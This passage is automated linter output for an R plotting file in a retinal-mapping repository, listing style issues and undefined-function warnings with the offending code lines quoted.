characters.**\n```r\n​        ## https://stackoverflow.com/questions/18509527/first-letter-to-upper-case\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:109:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                        ^\n```\n[R/plotting_functions.R:109:62:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                             ^\n```\n[R/plotting_functions.R:109:93:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(\"NA,\", nasal_outline_index, \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                            ^\n```\n[R/plotting_functions.R:112:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Lines should not be more than 80 characters.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:112:58:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                         ^\n```\n[R/plotting_functions.R:112:63:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Commas should always have a space after.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                              ^\n```\n[R/plotting_functions.R:112:94:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​        line2 <- paste0(dorsal_outline_index, \",NA\", \",\",phi0,\",NA,TRUE,\\\"\", eye_side_string, \n                                                                                             ^\n```\n[R/plotting_functions.R:120:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L120) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote markup file to \", output_path, \"\\n Ensure that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:130:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L130) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param tear_coordinates_dataframe the dataframe of 3 columns, with c('V0','VB','VF'), and n columns, where n= number of tears\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:131:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L131) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the T.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:135:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L135) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_tear_file <- function(tear_coordinates_dataframe, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:138:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L138) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write.table(tear_coordinates_dataframe, output_path, sep = \",\", row.names = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:139:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L139) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote tear file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:147:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L147) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param path_to_retina_data_folder The path where the P.csv file will be saved.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Lines should not be more than 80 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:151:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L151) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​assemble_point_coordinates_file <- function(outline_coordinates, path_to_retina_data_folder) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:155:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L155) *style:* **Lines should not be more than 80 characters.**\n```r\n​    message(paste(\"Wrote coordinates file to \", output_path, \"\\n Check that it exists beside your outline.roi file\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:177:59:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_degree_label_for_latitudes <- function(outer_radius, circle.rads) {\n                                                          ^~~~~~~~~~~\n```\n[R/plotting_functions.R:178:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Lines should not be more than 80 characters.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:178:85:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​    axis(2, pos = -1.25 * outer_radius, at = sort(union(circle.rads, -circle.rads)), \n                                                                                    ^\n```\n[R/plotting_functions.R:180:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:180:95:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L180) *style:* **Trailing whitespace is superfluous.**\n```r\n​    text(-1.26 * outer_radius, sort(union(circle.rads, -circle.rads)), sort(union(circle.rads, \n                                                                                              ^\n```\n[R/plotting_functions.R:195:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L195) *style:* **Lines should not be more than 80 characters.**\n```r\n​    fields::image.plot(legend.only = TRUE, col = col, zlim = zlim, family = \"Palatino\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:202:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L202) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints a 4 element numeric vector describing the xy and x'y' for the line segment.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:206:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L206) *style:* **Lines should not be more than 80 characters.**\n```r\n​    segments(endpoints[1], endpoints[2], endpoints[3], endpoints[4], col = color_hex)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:216:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L216) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param endpoints vector of 4 numerics, x,y and x',y' defining the line segment\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:217:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L217) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​write_labels_at_endpoint_locations <- function(r_label, l_label, degree, endpoints) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:226:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L226) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description We do not need points plotted in the corners of the plotted circle.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Lines should not be more than 80 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:233:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L233) *style:* **Trailing whitespace is superfluous.**\n```r\n​nullify_vals_outside_the_circle <- function(minitics, spatial_res, heatmap_matrix, \n                                                                                  ^\n```\n[R/plotting_functions.R:235:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L235) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    matrix_position_is_within_the_circle <- function() {\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:238:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L238) *style:* **Variable or function name should be snake_case.**\n```r\n​    markNA <- matrix(minitics, ncol = spatial_res, nrow = spatial_res)\n    ^~~~~~\n```\n[R/plotting_functions.R:246:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L246) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description Find the location to put the label around the circle at each of the lines\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:251:46:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L251) *style:* **Variable or function name should be snake_case.**\n```r\n​compute_longitude_label_location <- function(axis.rads, outer_radius) {\n                                             ^~~~~~~~~\n```\n[R/plotting_functions.R:252:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:252:14:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L252) *warning:* **no visible global function definition for ‘RMat’, Did you mean 'hat'?**\n```r\n​    return(c(RMat(axis.rads) %*% matrix(c(1.1, 0, -1.1, 0) * outer_radius, ncol = 2)))\n             ^~~~\n```\n[R/plotting_functions.R:261:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Lines should not be more than 80 characters.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:261:88:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L261) *style:* **Trailing whitespace is superfluous.**\n```r\n​    endpoints <- zapsmall(c(RMat(axis_radian) %*% matrix(c(1, 0, -1, 0) * outer_radius, \n                                                                                       ^\n```\n[R/plotting_functions.R:263:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L263) *warning:* **no visible global function definition for ‘draw_line_segments’**\n```r\n​    draw_line_segments(endpoints)\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:267:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L267) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description put a degree label at the ends of the endpoints for each longitude\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Lines should not be more than 80 characters.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:274:38:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L274) *style:* **Variable or function name should be snake_case.**\n```r\n​plot_longitudinal_labels <- function(axis.rad, outer_radius, r_label, l_label, degree) {\n                                     ^~~~~~~~\n```\n[R/plotting_functions.R:275:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Lines should not be more than 80 characters.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:275:108:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L275) *style:* **Trailing whitespace is superfluous.**\n```r\n​    write_labels_at_endpoint_locations(r_label, l_label, degree, compute_longitude_label_location(axis.rad, \n                                                                                                           ^\n```\n[R/plotting_functions.R:285:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L285) *style:* **Variable or function name should be snake_case.**\n```r\n​RMat <- function(radians) {\n^~~~\n```\n[R/plotting_functions.R:286:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L286) *style:* **Lines should not be more than 80 characters.**\n```r\n​    return(matrix(c(cos(radians), sin(radians), -sin(radians), cos(radians)), ncol = 2))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:290:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L290) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @description plots radial lines, degree label for latitudes, and plots radial spokes with labels\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:295:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L295) *warning:* **no visible global function definition for ‘plot_circle_radial_lines’**\n```r\n​    plot_circle_radial_lines(radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:296:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L296) *warning:* **no visible global function definition for ‘plot_degree_label_for_latitudes’**\n```r\n​    plot_degree_label_for_latitudes(outer_radius, radius_vals)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:297:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L297) *warning:* **no visible global function definition for ‘plot_radial_spokes_and_labels’**\n```r\n​    plot_radial_spokes_and_labels(outer_radius)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:324:71:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L324) *style:* **Variable or function name should be snake_case.**\n```r\n​define_color_breaks_based_on_source <- function(col_breaks_source, z, Mat) {\n                                                                      ^~~\n```\n[R/plotting_functions.R:329:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L329) *style:* **Lines should not be more than 80 characters.**\n```r\n​    } else if ((length(col_breaks_source) == 2) & (is.numeric(col_breaks_source))) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:346:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L346) *style:* **Lines should not be more than 80 characters.**\n```r\n​##' @param extrapolate whether to predict out to the equator of the eye, even if no data exists nearby.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:347:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L347) *style:* **Lines should not be more than 80 characters.**\n```r\n​interpolate_input_data <- function(minitics, x, y, z, lambda, polynomial_m, extrapolate) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Lines should not be more than 80 characters.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:348:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Variable or function name should be snake_case.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:348:15:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L348) *style:* **Use <-, not =, for assignment.**\n```r\n​    grid.list = list(x = minitics, y = minitics)  #choose locations to predict at\n              ^\n```\n[R/plotting_functions.R:349:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *style:* **Lines should not be more than 80 characters.**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:349:10:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L349) *warning:* **no visible global function definition for ‘Tps’, Did you mean 'Ops'?**\n```r\n​    t <- Tps(cbind(x, y), z, lambda = lambda, m = polynomial_m)  #computationally intensive\n         ^~~\n```\n[R/plotting_functions.R:350:12:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L350) *warning:* **no visible global function definition for ‘predictSurface’**\n```r\n​    tmp <- predictSurface(t, grid.list, extrap = extrapolate)\n           ^~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:351:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L351) *style:* **Variable or function name should be snake_case.**\n```r\n​    Mat <- tmp$z\n    ^~~\n```\n[R/plotting_functions.R:363:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Variable or function name should be snake_case.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n    ^~~~~~~~~\n```\n[R/plotting_functions.R:363:25:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                       ~^~\n```\n[R/plotting_functions.R:363:31:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                             ~^~\n```\n[R/plotting_functions.R:363:37:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                   ~^~\n```\n[R/plotting_functions.R:363:47:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                             ~^~\n```\n[R/plotting_functions.R:363:57:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L363) *style:* **Put spaces around all infix operators.**\n```r\n​    axis.rads <- c(0, pi/6, pi/3, pi/2, 2 * pi/3, 5 * pi/6)\n                                                       ~^~\n```\n[R/plotting_functions.R:364:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L364) *style:* **Variable or function name should be snake_case.**\n```r\n​    r.labs <- c(90, 60, 30, 0, 330, 300)\n    ^~~~~~\n```\n[R/plotting_functions.R:365:5:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    l.labs <- c(270, 240, 210, 180, 150, 120)\n    ^~~~~~\n```\n[R/plotting_functions.R:367:9:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L367) *warning:* **no visible global function definition for ‘plot_longitudinal_lines’**\n```r\n​        plot_longitudinal_lines(axis.rads[i], outer_radius)\n        ^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:1:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Lines should not be more than 80 characters.**\n```r\n​        plot_longitudinal_labels(axis.rads[i], outer_radius, r.labs[i], l.labs[i], \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting_functions.R:368:83:](https://github.com/bc/retina/blob/002662d3eea76706eb6de58bc2991e242e85456e/R/plotting_functions.R#L368) *style:* **Trailing whitespace is superfluous.**\n```r\n​        